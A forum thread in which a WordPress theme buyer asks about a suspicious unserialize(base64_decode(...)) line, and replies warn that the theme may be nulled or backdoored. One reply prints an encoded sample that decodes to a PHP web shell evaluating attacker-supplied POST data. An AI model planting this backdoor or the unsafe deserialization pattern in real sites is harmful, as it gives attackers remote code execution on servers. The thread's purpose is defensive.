10 {{ upvoteCount | shortNum }}
10 {{ upvoteCount | shortNum }}

Bought A New Wordpress Theme There Is Suscpectful Code

by mediamarket
8 replies
I bought a custom theme for wordpress. There is this code in there

$smof_data = unserialize(base64_decode($smof_data)); //100% safe - ignore theme check

Should I be worried?
#bought #code #suscpectful #theme #wordpress
  • Profile picture of the author stoltingmediagroup
    Try this site: The Web Template Verification Service
    Signature
    Arnold Stolting - Stolting Media Group
    "I LOVE The Song! The Vibe Is Positive And Firm!" - Kymani Marley. (Son of Bob Marley).
    "Very High Quality!" Jeremy Harding - Manager / Producer. Sean Paul.
    "They Are FANTASTIC!" - Willie Crawford.
    {{ DiscussionBoard.errors[9116367].message }}
    • Profile picture of the author Jeff Gibson
      Originally Posted by stoltingmediagroup View Post

      Thanks for the share, never knew this existed. I recently downloaded a free version of a theme I was considering purchasing and ran it through the themechecker and it came back with a big fat "0" with a laundry list of problems.
      Signature

      {{ DiscussionBoard.errors[9117575].message }}
  • Profile picture of the author shazbat
    Out of interest, what theme was this?
    Signature

    Work smarter not harder

    {{ DiscussionBoard.errors[9116373].message }}
  • Profile picture of the author mediamarket
    Thanks Stolting! I never knew anything like that existed!
    {{ DiscussionBoard.errors[9116386].message }}
  • Profile picture of the author Sarevok
    Whenever I see base64 in any PHP script I get scared.

    Base64 links can be used to en/decode, hide, or change links. AKA highjack/reprogram/redirect traffic.

    Ask yourself if the vendor of the theme is reliable?



    Just my $.02
    Signature
    {{ DiscussionBoard.errors[9116399].message }}
  • Profile picture of the author sbucciarel
    Banned
    Let us know how it checked out on The Web Template Verification Service
    {{ DiscussionBoard.errors[9117285].message }}
  • Profile picture of the author Paul Tai
    "Comment" that line and see if everything still works. If so, then cool.
    {{ DiscussionBoard.errors[9117579].message }}
  • Profile picture of the author Nate Simms
    Base64 code, much of the time, is a clear signal that the theme has been "nulled."

    Especially in this case.

    Without digging into it much, it looks like this code is overriding the theme's serial number check. Rather than the theme "calling home" to the developer of the theme to make sure it is a legitimate copy, the Base64 code is "nulling" that procedure so that the theme can be uploaded/activated without the proper serial code/licensing.

    Are you sure you bought this theme from a legitimate developer?

    In any case, Base64 code -- as mentioned -- can lead to more significant problems (such as backdoor access to your WP install/server). Be careful with this one.

    Also: you should look for any strange files within the directory (for example, image.php). A lot of the time it is these random -- seemingly harmless files -- that contain the actual coded Base64 codes.

    If you view the file, it will often look something like this:

    Code:
    aWYoaXNzZXQoJF9QT1NUWydlJ10pKWV2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbJ2UnXSkpO2VjaG8gJzMxMzkzNjJlMzIzMzMxMmQzMTM3MzIyZTMyMzgzYTY5NjY2MTYzNjU3MjZkNzA3NTYyNmQ2OTYzNjUzYTYxNjY2MTYzMzQzMjY1NzI2OTMwMzInOw==
    And, as you decode that (just Google a decoding site), it will often expose the "echo code" (that needs further decoding to expose its final destination) that is actually going to be doing the damage.
    {{ DiscussionBoard.errors[9117599].message }}

Trending Topics